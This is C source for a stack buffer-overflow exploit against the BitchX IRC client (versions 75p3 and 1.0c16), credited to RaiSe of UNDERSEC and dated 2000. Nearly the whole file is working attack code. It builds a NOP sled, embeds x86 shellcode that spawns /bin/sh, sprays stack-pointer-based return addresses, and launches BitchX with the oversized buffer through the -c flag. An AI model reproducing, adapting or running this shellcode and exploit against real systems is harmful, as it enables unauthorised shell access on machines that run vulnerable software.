/* BitchX Xploit by RaiSe                               [2000]*/
/* Tested in 75p3 and 1.0c16                            [2000]*/
/* you must do a 'reset'(bash$reset) after running the xploit */
/* UNDERSEC Security Team                               [2000]*/
/* http://www.undersec.com                              [2000]*/

#include <stdio.h>

#define PATH    "/usr/local/bin/BitchX"

int i;
char *ptr;
unsigned long *ptr2;
char execshell[] =
  "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char buffer[2092];

int main(int argc, char *argv[])
{
  long get_sp(void)
  {
    __asm__("movl %esp,%eax\n");
  }

  if (argc<2) {
    printf("\nBitchX (75p3/1.0c16) Xploit por RaiSe");
    printf("\nUNDERSEC Security TEAM\nhttp://www.undersec.com");
    printf("\n\nModo de empleo: %s offset\n\n",argv[0]);
    exit(0);
  }

  for(i=0;i<2092;i++)
    buffer[i]=0x00;
  ptr=buffer;

  for(i=0;i<2048-strlen(execshell);i++)
    *(ptr++)=0x90;
  for(i=0;i<strlen(execshell);i++)
    *(ptr++)=execshell[i];
  ptr2=(long *)ptr;
  for(i=0;i<11;i++)
    *(ptr2++)=get_sp()+atoi(argv[1]);
  execl(PATH, "BitchX", "-c", buffer, 0);
}
/*                    www.hack.co.za           [19 July 2000]*/